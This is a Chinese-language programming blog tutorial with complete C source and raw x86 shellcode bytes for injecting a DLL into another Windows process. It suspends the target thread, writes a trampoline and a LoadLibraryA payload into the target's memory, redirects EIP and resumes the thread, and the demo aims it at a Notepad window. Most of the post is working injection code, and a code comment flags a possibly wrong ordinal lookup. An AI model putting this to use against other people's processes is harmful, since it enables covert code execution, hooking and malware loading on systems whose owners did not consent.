修改线程上下文注入DLL
一、注入原理
获取目标进程的某个线程,暂停之,获取线程上下文,在目标进程中分配虚拟内存,写入 ShellCode,修改上下文结构中的 EIP 使其指向 ShellCode,设置上下文,恢复线程。需要注意两点:其一,ShellCode 运行在被劫持线程原有的栈和寄存器环境中,执行前后必须保存并恢复通用寄存器和标志位,最后再跳回原 EIP,否则线程恢复后寄存器状态已被破坏;其二,本文的 ShellCode 是 32 位机器码且依赖 CONTEXT.Eip,仅适用于 x86 目标进程。
二、完整代码
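/*
 * DLL injection by thread-context hijacking (x86 targets only).
 *
 * A target thread is suspended, a small trampoline stub + a position-independent
 * LoadLibraryA payload + the DLL path are written into the target process, the
 * thread's EIP is pointed at the stub and the thread is resumed.  The stub saves
 * the hijacked thread's general registers and flags, calls the payload with the
 * DLL path as its single argument, restores the registers and jumps back to the
 * original EIP, so the thread continues as if nothing had happened.
 *
 * Everything below is 32-bit machine code and uses CONTEXT.Eip, which only
 * exists in the x86 CONTEXT structure; it neither compiles for nor works on
 * x64 targets.
 */

enum {
    STUB_OFF_NAME_IMM    = 3,   /* imm32 of "push <remote DLL path>"      */
    STUB_OFF_PAYLOAD_IMM = 8,   /* imm32 of "mov eax, <remote payload>"   */
    STUB_OFF_JMP_REL     = 20,  /* rel32 of "jmp <original EIP>"          */
    STUB_SIZE            = 24
};

/*
 * Trampoline executed on the hijacked thread.  Byte offsets:
 *   00  9C                pushfd
 *   01  60                pushad
 *   02  68 xx xx xx xx    push  <remote DLL path>
 *   07  B8 xx xx xx xx    mov   eax, <remote payload>
 *   0C  FF D0             call  eax
 *   0E  83 C4 04          add   esp, 4         ; payload takes one cdecl-style argument
 *   11  61                popad
 *   12  9D                popfd
 *   13  E9 xx xx xx xx    jmp   <original EIP> ; rel32 measured from offset 0x18
 * The pushfd/pushad ... popad/popfd pair is what keeps the hijacked thread's
 * EAX and EFLAGS intact; without it the thread resumes at its original EIP
 * with EAX holding the payload address and flags clobbered by "add esp, 4".
 */
static const unsigned char kStubTemplate[STUB_SIZE] = {
    0x9C, 0x60,
    0x68, 0x00, 0x00, 0x00, 0x00,
    0xB8, 0x00, 0x00, 0x00, 0x00,
    0xFF, 0xD0,
    0x83, 0xC4, 0x04,
    0x61, 0x9D,
    0xE9, 0x00, 0x00, 0x00, 0x00
};

/*
 * Position-independent payload: locates kernel32!LoadLibraryA through the PEB
 * loader list and the kernel32 export table, then calls it with [ebp+8]
 * (the DLL path pushed by the stub).  Bytes are unchanged from the original;
 * the comments describe what they decode to.
 */
static const unsigned char kPayload[] = {
    /* push ebp / mov ebp,esp / pushad / pushfd / sub esp,0x28 */
    0x55, 0x8B, 0xEC, 0x60, 0x9C, 0x83, 0xEC, 0x28,
    /* fill the 0x28-byte local area at [ebp-0x4C] with 0xCC (rep stosd) */
    0xB9, 0x0A, 0x00, 0x00, 0x00, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0x8D, 0x7D, 0xB4, 0xF3, 0xAB,
    /* build "LoadLibraryA\0" on the stack with four pushes */
    0x6A, 0x00, 0x68, 0x61, 0x72, 0x79, 0x41, 0x68, 0x4C, 0x69, 0x62, 0x72, 0x68, 0x4C, 0x6F, 0x61, 0x64,
    /* fs:[0x30] (PEB) -> Ldr -> InMemoryOrderModuleList */
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x40, 0x14,
    /* walk the list until BaseDllName[6] == '3' (i.e. kernel32) */
    0x8B, 0x00, 0x8B, 0x70, 0x28, 0x80, 0x7E, 0x0C, 0x33, 0x75, 0xF5,
    /* eax = DllBase; ebx = export directory; edx = AddressOfNames */
    0x8B, 0x40, 0x10, 0x8B, 0xF8, 0x03, 0x7F, 0x3C, 0x8B, 0x7F, 0x78, 0x03, 0xF8, 0x8B, 0xDF, 0x8B, 0x53, 0x20, 0x03, 0xD0,
    /* [ebp-0x4C] = 0 (name index) */
    0xC7, 0x45, 0xB4, 0x00, 0x00, 0x00, 0x00,
    /* loop: esi = &"LoadLibraryA"; edi = names[index]; index++; repe cmpsb 12 bytes; jne loop */
    0x8B, 0xF5, 0x83, 0xEE, 0x5C, 0x8B, 0x4D, 0xB4, 0x8B, 0x3C, 0x8A, 0x03, 0xF8, 0x83, 0x45, 0xB4, 0x01,
    0xB9, 0x0C, 0x00, 0x00, 0x00, 0xF3, 0xA6, 0x75, 0xE6,
    /* NOTE(review): the index is incremented before the compare, so the ordinal lookup below
     * reads AddressOfNameOrdinals[index+1] and then subtracts the export Base; this appears
     * to resolve LoadLibraryA only because kernel32's name order matches its ordinal order --
     * confirm before reusing this payload against another DLL. */
    /* ecx = ordinals[index] & 0xFFFF; ecx -= Base; eax += AddressOfFunctions[ecx] */
    0x8B, 0x7B, 0x24, 0x03, 0xF8, 0x8B, 0x4D, 0xB4, 0x8B, 0x0C, 0x4F, 0x81, 0xE1, 0xFF, 0xFF, 0x00, 0x00,
    0x8B, 0x7B, 0x10, 0x2B, 0xCF, 0x8B, 0x7B, 0x1C, 0x03, 0xF8, 0x8B, 0x3C, 0x8F, 0x03, 0xC7,
    /* push [ebp+8]; call eax; add esp,0x38; popfd; popad; mov esp,ebp; pop ebp; ret */
    0x8B, 0x5D, 0x08, 0x53, 0xFF, 0xD0, 0x83, 0xC4, 0x38, 0x9D, 0x61, 0x8B, 0xE5, 0x5D, 0xC3
};

/* Writes len bytes into the target and treats a short write as a failure (last error set). */
static BOOL writeRemote(HANDLE hProcess, LPVOID dst, const void *src, SIZE_T len)
{
    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess, dst, src, len, &written))
        return FALSE;
    if (written != len) {
        SetLastError(ERROR_PARTIAL_COPY);
        return FALSE;
    }
    return TRUE;
}

/* Fills a copy of the stub template with the three remote addresses it needs. */
static void buildStub(unsigned char *stub, DWORD stubAddr, DWORD payloadAddr,
                      DWORD nameAddr, DWORD originalEip)
{
    /* jmp rel32 is relative to the instruction after the jmp, which is the end of the stub */
    DWORD jmpRel = originalEip - (stubAddr + STUB_SIZE);

    memcpy(stub, kStubTemplate, STUB_SIZE);
    memcpy(stub + STUB_OFF_NAME_IMM,    &nameAddr,    sizeof(nameAddr));
    memcpy(stub + STUB_OFF_PAYLOAD_IMM, &payloadAddr, sizeof(payloadAddr));
    memcpy(stub + STUB_OFF_JMP_REL,     &jmpRel,      sizeof(jmpRel));
}

/*
 * Work done while the thread is suspended: read its context, place stub +
 * payload + path in the target, make the region executable and redirect EIP.
 * On any failure the remote region is released and the context is left
 * untouched, so the caller can simply resume the thread.  On success the
 * region is intentionally left mapped: the target thread still has to run it.
 * Returns 0 or a Win32 error code.
 */
static DWORD redirectSuspendedThread(HANDLE hProcess, HANDLE hThread, const char *lpszDllPath)
{
    CONTEXT ctx;
    ZeroMemory(&ctx, sizeof(ctx));
    ctx.ContextFlags = CONTEXT_FULL;
    if (!GetThreadContext(hThread, &ctx))
        return GetLastError();

    const SIZE_T nameSize = strlen(lpszDllPath) + 1;          /* copy the terminating NUL as well */
    const SIZE_T total    = STUB_SIZE + sizeof(kPayload) + nameSize;

    /* Allocate writable only; it is flipped to execute-only-read after the writes (W^X). */
    BYTE *remoteStub = (BYTE *)VirtualAllocEx(hProcess, NULL, total,
                                              MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (remoteStub == NULL)
        return GetLastError();
    BYTE *remotePayload = remoteStub + STUB_SIZE;
    BYTE *remoteName    = remotePayload + sizeof(kPayload);

    unsigned char stub[STUB_SIZE];
    buildStub(stub,
              (DWORD)(DWORD_PTR)remoteStub,
              (DWORD)(DWORD_PTR)remotePayload,
              (DWORD)(DWORD_PTR)remoteName,
              ctx.Eip);

    DWORD dwRet = 0;
    DWORD oldProtect = 0;
    if (!writeRemote(hProcess, remoteStub, stub, STUB_SIZE) ||
        !writeRemote(hProcess, remotePayload, kPayload, sizeof(kPayload)) ||
        !writeRemote(hProcess, remoteName, lpszDllPath, nameSize) ||
        !VirtualProtectEx(hProcess, remoteStub, total, PAGE_EXECUTE_READ, &oldProtect)) {
        dwRet = GetLastError();
    } else {
        ctx.Eip = (DWORD)(DWORD_PTR)remoteStub;
        if (!SetThreadContext(hThread, &ctx))
            dwRet = GetLastError();
    }

    if (dwRet != 0)
        VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);  /* thread never reaches the stub */
    return dwRet;
}

/* Suspends the thread, performs the redirection and always resumes it afterwards. */
static DWORD hijackThread(HANDLE hProcess, HANDLE hThread, const char *lpszDllPath)
{
    if (SuspendThread(hThread) == (DWORD)-1)
        return GetLastError();

    DWORD dwRet = redirectSuspendedThread(hProcess, hThread, lpszDllPath);

    /* Resume unconditionally: a failed redirection left the context untouched, and
     * leaving the thread suspended would hang the target window. */
    if (ResumeThread(hThread) == (DWORD)-1 && dwRet == 0)
        dwRet = GetLastError();
    return dwRet;
}

/*
 * Injects lpszDllPath into the process owning hWindow by hijacking the window's
 * thread.  lpszDllPath is resolved by LoadLibraryA inside the *target*, so a
 * relative name is looked up in the target's search path, not the injector's.
 * Returns 0 on success, otherwise a Win32 error code (GetLastError value).
 */
DWORD injectThreadContext(HWND hWindow, const char *lpszDllPath)
{
    if (hWindow == NULL || lpszDllPath == NULL || *lpszDllPath == '\0')
        return ERROR_INVALID_PARAMETER;

    DWORD dwProcessID = 0;
    DWORD dwThreadID  = GetWindowThreadProcessId(hWindow, &dwProcessID);
    if (dwThreadID == 0)                          /* not a live window */
        return ERROR_INVALID_WINDOW_HANDLE;

    /* Least privilege: only the rights the calls below actually need. */
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID);
    if (hProcess == NULL)
        return GetLastError();

    DWORD dwRet;
    HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT,
                                FALSE, dwThreadID);
    if (hThread == NULL) {
        dwRet = GetLastError();
    } else {
        dwRet = hijackThread(hProcess, hThread, lpszDllPath);
        CloseHandle(hThread);
    }
    CloseHandle(hProcess);
    return dwRet;
}

/* Demo entry point: injects asm_dll.dll into an untitled Notepad window. */
int _tmain(int argc, _TCHAR *argv[])
{
    (void)argc;
    (void)argv;

    /* NOTE: a relative name is resolved inside the target; prefer a full path. */
    const char *lpszDll        = "asm_dll.dll";
    const char *lpszWindowName = "无标题 - 记事本";   /* alternative target used while testing: "[ LordPE Deluxe ] by yoda" */

    HWND hWindow = FindWindowA(NULL, lpszWindowName);
    if (hWindow == NULL) {
        printf("找不到指定窗口: %s \r\n", lpszWindowName);
        return 1;
    }

    DWORD dwRet = injectThreadContext(hWindow, lpszDll);
    printf("injectThreadContext ret: %lu \r\n", (unsigned long)dwRet);
    return dwRet == 0 ? 0 : 1;
}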
三、注解
1、ShellCode还是用的上一篇文章的 http://blog.csdn.net/antihips/article/details/53020750,调用方式稍作改造:
push lpszDllPath
mov eax, ShellCode
call eax
add esp, 0x4
整个代码结构就是:
调用者
ShellCode
名称字符串
注意:写入目标进程前需要修正三处地址:dll 路径字符串的地址、ShellCode 的地址,以及 JMP 回原 EIP 的相对偏移(rel32 以 JMP 指令的下一条指令为基准计算)。
2、查找目标进程,获取进程ID,线程ID,打开之
3、暂停线程,获取线程上下文,分配虚拟内存
4、修正 ShellCode 中的地址,写入到虚拟内存,修改线程上下文 EIP。
5、把线程上下文设置回去,恢复线程。
四、效果